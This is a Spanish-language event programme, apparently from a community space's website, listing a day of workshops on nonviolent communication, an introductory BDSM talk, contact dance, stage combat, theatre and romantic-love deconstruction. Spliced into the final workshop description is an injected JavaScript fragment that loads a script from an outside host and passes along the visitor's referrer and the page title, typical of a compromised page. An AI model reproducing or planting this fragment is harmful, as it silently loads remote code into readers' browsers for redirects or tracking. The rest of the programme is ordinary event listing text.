Programació PIC 24 de Abril – Touch&Play / Comunicación Empática – BDSM – Música con Kwame – Acciones para la paz – Danza Contact – Teatro “La Duquesa” – Deconstrucción del amor romántico

Hola

Esta semana en la Vall de Can Masdeu cedemos el espacio del PIC para las compañeras del Touch&Play Project

El Touch & Play Project esta semana nos aporta excitantes experiencias de exploración, actividades basados en el cuerpo e inspirados desde el Contact Improvisación hasta el BDSM, el desarrollo personal y la acción política. Somos un grupo sexpositivo interesado en aprender y compartir formas auténticas y seguras de crear conexiones con uno mismo y con los otros, a través del contacto y los juegos. ¿Te apetece jugar? ¡Exploremos juntos!

MATÍ

10:30-14:30h Comunicación Empática

Introducción a la Comunicación No Violenta de Marshall Rosenberg . La “Comunicación No Violenta” (CNV) se basa en los principios de la no violencia – el estado natura de la compasión, cuando la paz está presente en el corazón.

La CNV comienza asumiendo que todos somos compasivos por naturaleza y que las estrategias violentas, ya sean comportamientos verbales o físicos, son comportamientos aprendidos y apoyados por la cultura dominante. También asume que todos compartimos las mismas necesidades humanas básicas, y que cada una de nuestras acciones son una estrategia para cumplir con una o más de estas necesidades.

Con esta técnica aprendemos a escuchar nuestras necesidades más profundas y las de los demás, ayudándonos a descubrir la profundidad de nuestra compasión. Este lenguaje pone de manifiesto la conciencia de que todos los seres humanos únicamente tratan de honrar valores y necesidades universales, cada minuto, cada día.

La CNV puede ser vista como una práctica espiritual que nos ayuda a ver nuestra humanidad común, utilizando nuestro poder de una manera que honra las necesidades todos y todas, así como un conjunto concreto de habilidades que nos ayuden a crear-servir a la vida de las familias y comunidades. A través de esta práctica, podemos aprender a aclarar que es lo que estamos observando, aquellas emociones que estamos sintiendo, cuales son los valores con los que queremos vivir, y que queremos hacer de nosotros mismo y de los demás. Ya no tendremos que seguir el lenguaje de la culpa, del juicio o de la dominación. Podemos experimentar el profundo placer de contribuir al bienestar de los demás.

CNV crea un camino para la curación y la reconciliación en sus múltiples aplicaciones, que van desde las relaciones íntimas, lugares de trabajo, servicios sociales, a los gobiernos, escuelas, organizaciones de cambio social y comunidades.

Taller impartido por Dr. Daniel J.Hayes

12-14h Introducción al BDSM

Una domina profesional nos dará una charla informativa e interactiva sobre el BDSM en la práctica, con apuntes teóricos acerca de su origen y filosofía. BDSM (bondage, discipline, dominance/submission, sadomasochism) es el acrónimo que se usa para describir una serie de juegos sexuales que se juegan consensuados entre dos o más personas. Será un taller puramente teórico enfocado a una discusión entre expertos en estas práctica e intentará aclarar las dudas y malentendidos que existen en el entorno del BDSM

Taller impartido por Monique.

14h Actuación musical con Kwame

Kwame es un músico de origen de Ghana con mas de 30 años en el escenario. Ha recorrido gran parte del continente africano y algunos paises de Europa y Latinoamèrica con diferentes proyectos, tocando diferentes instrumentos. Ahora dirige su banda, Kwame & Afrovibes, un recorrido por diferentes estilos africanos, Afrobeat, Makossa, Native Blues, etc., mezclado con los ritmos de Funk, Reggae e incluso el Rock.

TARDA

16-18h Acciones para la paz

Basado en el libro “122 acciones fáciles (y difíciles) para la paz”, clarifica las principales concepciones de paz para presentar diferentes acciones de colectivos implicados, desde el antimilitarismo, la ecología, la perspectiva de género, el enfoque de derechos… El taller permitirá dar a conocer experiencias destacadas, y también compartir ideas de acción de lo que se puede hacer desde el día a día.

Charla impartida por la autora, Cecile Barbeito

16-18h Taller de introducción al Contact y Jam

El contact-improvisación es la danza libre que juega con la gravedad, el impulso y el peso. Es una práctica de infinita posibilidades y donde es (casi) imposible hacerlo bien o mal. En este taller vamos a explorar los conceptos básicos, empezando por el contacto con nosotros mismos – la base de todo contacto – con explorar nuestro propio cuerpo, su peso y las posibilidades de su movimiento, antes de entrar en contacto con el espacio y con una pareja … la clase nos llevará a una jam

18:30h Teatro: La Duquesa ha llegado a la ciudad

Una dama perteneciente a la más alta aristocracia europea llega a la ciudad con un extraño propósito. La Duquesa es un personaje que nos hace reflexionar, a través del humor, sobre el dinero y su poder.

18-20h Los que se pelean, se desean

“El único acto tan íntimo como amar es pelearse”

Sorprendente taller de combate escénico donde aprenderemos técnicas básicas de varias artes marciales, en especial Jeet Kune Do y Ground Game, para crear una sencilla coreografía improvisada a través de la cual vivir la emoción y la adrenalina como si de una vieja peli de ninjas o de Jackie Chan se tratase, con la seguridad de que nadie se va a hacer daño.

Aprenderemos que jugar a pelearse en una forma poderosa y alegre de comunicación no verbal, además de un poderoso preliminar y una forma de canalizar energías que de otro modo requerirían mucho tiempo.

El taller está dividido entre un breve calentamiento, la práctica de técnicas sueltas y cómo encadenarlas, y una improvisación final. Dura entre hora y media y dos horas.

Puedes venir solo/a, en pareja o con amigos. Vístete cómodo/a, sea de ninja, de luchador de lucha libre, de yogui o de chándal. No hace falta una forma física especial, lo justo para rodar por el suelo y dar saltitos.

Las plazas son limitadas. Para reservas, paraludologia@gmail.com

16:30-19:30 Deconstrucción vivencial del amor romántico 

Mediante dinámicas de teatro improvisado y espacios de confianza para la expresión emocional, queremos trabajar el efecto de la “presión amorosa”, detectar los tipos de violencia que pueden darse en las relaciones sexo-afectivas y deconstruir la pareja y los roles de género, explorando situaciones que cuestionan las “normas”: plurisexualidades, relaciones no-monógamas éticas, etc.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

This post is also available in: Spanish English